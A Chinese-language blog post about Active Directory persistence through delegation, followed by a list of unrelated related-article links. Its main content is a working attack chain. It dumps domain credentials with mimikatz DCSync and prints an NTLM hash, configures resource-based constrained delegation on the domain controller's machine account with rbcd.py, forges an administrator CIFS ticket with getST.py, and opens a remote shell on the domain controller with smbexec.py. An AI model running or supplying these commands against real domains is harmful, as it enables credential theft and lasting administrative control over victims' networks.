当前位置: 首页 > news >正文

域内委派维权

为某个服务账户配置 krbtgt 用户的非约束性委派或基于资源的约束性委派。这里我的 krbtgt 的基于资源约束性委派我利用不了,所以使用的是域控的机器账户 dc01$ 进行维权。

抓取所有 hash。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\administrator /csv" "exit"
​
这里很多账号都是如下 hash,是因为他们的密码都是一样的。
9099d68602a60f007c227c4fa95fada6
9099d68602a60f007c227c4fa95fada6

给机器账户 dc01$ 配置 machine$ 的基于资源的约束性委派

python ./rbcd.py -f comp1 -t dc01 -dc-ip 192.168.72.21 HACKER\\administrator -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6

以 administrator 请求 cifs/dc01.HACK.com 票据

# 以 administrator 请求 cifs/dc01.HACK.com 票据
python3 getST.py -dc-ip 192.168.72.21 HACK.com/machine$ -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 -spn cifs/dc01.HACK.com -impersonate administrator
​
export KRB5CCNAME=administrator@cifs_dc01.HACK.com@HACK.COM.ccache
​
python3 smbexec.py -no-pass -k dc01.HACK.com

相关文章:

  • [Java基础] 常用注解
  • nvm的学习
  • Python Cookbook-2.19 根据指定的搜索路径和模式寻找文件
  • 脑机接口SSVEP 信号特征提取技术术语
  • 认知动力学视角下的生命优化系统:多模态机器学习框架的哲学重构
  • CompletableFuture
  • unittest自动化测试框架详解
  • yunedit-post ,api测试比postman更好
  • 分布式数据存储:提升系统弹性与性能的技术之路
  • Ubuntu 防火墙iptables和 ufw
  • 数据集笔记:NUSMods API
  • 05类加载机制篇(D1_类文件结构)
  • Linux环境安装Nginx及版本升级指南
  • 自学微信小程序的第八天
  • 深入解析 Kubernetes CRD:原理、特点与典型应用场景
  • 苍穹外卖-阿里云OSS文件上传
  • 行业智能体构建的关键技术与实践路径探索
  • 【AD】3-6 层次原理图
  • day01_Java基础
  • 【AD】3-8 原理图封装批量化添加与完整性检查
  • 政府网站规范化建设方案/海淀区seo搜索引擎优化企业
  • 镇江做网站公司/痘痘怎么去除有效果
  • 天津市城市建设档案馆网站/seo具体seo怎么优化
  • 黄岩做网站的公司/河南it渠道网
  • 网站运行环境配置/品牌营销经典案例
  • 教育网站建设方案模板/软件开发公司经营范围